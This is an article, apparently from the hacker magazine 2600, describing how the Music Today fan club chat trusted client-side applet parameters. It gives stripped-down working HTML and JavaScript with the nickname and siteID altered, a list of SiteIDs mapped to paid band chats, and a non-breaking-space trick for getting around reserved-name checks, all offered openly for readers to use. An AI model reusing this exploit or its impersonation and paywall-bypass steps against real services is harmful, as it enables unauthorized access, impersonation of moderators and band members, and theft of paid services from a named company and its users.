Music Today

by noir

A lovely company called Music Today has recently caught my attention.  Music Today is a site that charges music bands money in exchange for hosting band fan clubs.  These fan club include online chat, customized email addresses, message boards, online merch shops and some other useless crap.

The Story

I'll admit, I did actually join one of the band's fan clubs (no, not the Backstreet Boys) and mostly just used the chat here and there.

One day I decided to look a bit closer at the chat and saw that they left a lot of chat parameters in the HTML, rather than embedding it into the Java applet.

I first looked at the PARAM NAME tag.  The value for this was set to my registered username.  So what happens when you change the value and load the page from locally on your machine?

Yes, it's that easy.  The value for this may not be obvious at first.  If you've ever been a fan of any music band, you know they have their fanatics.  Logging in as a band member was worth a chuckle the first few times.

After a while it got old and I just started using it to user whatever screen name I felt like that day.

The next thought I had about this was that if I could load the page locally...  Did I really need to login?

So I wouldn't have to worry about clearing cookies and cache and all that stuff, I sent the HTML file with modified name to a friend who had never been part of any Music Today club.  Sure enough, turns out you don't even need to be registered to load the chat!

You would think a company interested in making money would want their users to be paying for the services.  So the obvious next thought I have is, how do I get on fanclubs I haven't paid for?  That's where the lovely SiteID value comes in.

It seems at this time that most of the values between 1002 and 1021 have an associated fan club chat.  I didn't bother to go below 999/0999 or above 1025, but there may be more.

My final step at this point was to see how stripped down the code could get.  You can strip it quite a bit actually.  Enough that I can include it in this article.  So all you have to do to start playing around is set your username and pick whatever SiteID you want.  Yeah, sure, I'll attach the SiteIDs as well.  Feel free to try and strip the code down more.  I'm no expert at this.

So far the only real restrictions I've found on this is you cannot log in with the username: Admin

It is reserved.  The other reserved names will vary from fanclub to fanclub and they are the moderator usernames.  There are other security measures in place to prevent these two classes of usernames from being used.

Finally, if somebody else is already logged in with the name you're using, it will tell you to try again.

Feel free to try adding   (a non-breaking space) to the end of the username.

(It has come to my attention that Music Today plans to change their chat client soon.  Have fun while you still can, and in the meantime, start looking at how to play with ParaChat code.)

Chat Code
<html>
<td id="lblScript"><script language='Javascript'>
isMac = (navigator.appVersion.indexOf("Mac") != -1) ? true : false;
IEmac = ((document.all) && (isMac)) ? true : false;
IEwin = ((document.all) && (navigator.appVersion.indexOf("MSIE") != -1) && !isMac) ? true : false;
NS = (navigator.appName.indexOf("Netscape") != -1) ? true : false;

document.writeln("<APPLET NAME='DigiChat' CODEBASE='http://fanclubchat.musictoday.com/DigiChat/DigiClasses/' ");
document.writeln("CODE='com.diginet.digichat.client.DigiChatApplet' ");
document.writeln("HEIGHT=100 WIDTH=200 ALIGN='MIDDLE' ");

if (isMac)
  document.writeln("ARCHIVE=Client_Mac.jar MAYSCRIPT>");
  else if (!isMac) {
    if (IEwin) {
      document.writeln("ARCHIVE=Client_Plugin.jar MAYSCRIPT>");
      document.write(" <PARAM NAME=cabbase value=Client_IE.cab>");
      document.write(" <PARAM NAME=useslibrary value=DigiChat Applet>");
      document.write(" <PARAM NAME=namespace value=Digi-Net>");
      document.write(" <PARAM NAME=useslibrarycodebase value=Client_IE.cab>");
      document.write(" <PARAM NAME=useslibraryversion value=4,0,1,0>");
    }
  else if (NS)
    document.writeln("ARCHIVE='Client_NS.jar' MAYSCRIPT>");
  }
document.write(" <PARAM NAME=nickname VALUE=Admin>");
document.write(" <PARAM NAME=language VALUE=english.lang>");
document.write(" <PARAM NAME=siteID VALUE=1008>");
document.write(" <PARAM NAME=background VALUE=606A6D>");
document.write(" <PARAM NAME=signed VALUE=true>");
document.write(" <PARAM NAME=textcolor VALUE=000000>");
document.write(" DigiChat requires a Java Compatible web browser to run. ");
document.write(" </APPLET>");
</script></td>
</html>
SiteIDs
1023 = none
1022 = none
1021 = NIN
1020 = Krewe of Roo
1019 = Backstreet Boys
1018 = Gretchen Wilson
1017 = The Freak Parade
1016 = Hick Hop Federation
1015 = none
1014 = Mike Doughty (pw protected)
1013 = Xposed
1012 = The Unedited Jewel Chat
1011 = Kenny Chesney
1010 = Good Charlotte
1009 = Jem Chat
1008 = Usher World
1007 = Britney Spears
1006 = ICON Chat
1005 = MusicToday
1004 = none
1003 = The Union Hall
1002 = Shania Twain
1001 = "Invalid Host"

Return to $2600 Index